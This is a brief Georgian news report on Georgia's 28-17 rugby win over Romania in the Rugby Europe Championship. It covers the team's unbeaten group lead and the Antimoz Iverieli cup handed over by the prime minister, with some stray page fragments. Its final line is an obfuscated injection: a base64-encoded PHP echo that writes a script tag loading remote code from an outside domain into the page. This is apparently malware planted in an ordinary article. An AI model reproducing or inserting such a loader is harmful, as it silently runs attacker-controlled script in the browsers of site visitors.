celsiusi
ავერსი შნაიდერი
საქართველოს მორაგბეთა ნაკრებმა თბილისში, რაგბი ევროპის ჩემპიონატის მეოთხე ტურის მატჩში, რუმინეთის ნაკრები ანგარიშით 28-ით 17 დაამარცხა.
 
ამრიგად, საქართველოს ნაკრებს რაგბი ევროპის გათამაშებაში 4 შეხვედრიდან 4 გამარჯვება დაუგროვდა და ჯგუფში პირველ ადგილს იკავებს.
 
საქართველოს ნაკრებმა რუმინეთთან შეხვედრამდე ესპანეთს, პორტუგალიასა და რუსეთს სძლია.
 
საქართველოში დარჩა ანთიმოზ ივერიელის თასიც, რომელიც ორ ქვეყანას - საქართველოსა და რუმინეთს შორის თამაშდება. თასი მორაგბეებს საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა გადასცა.
 
 
1394
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");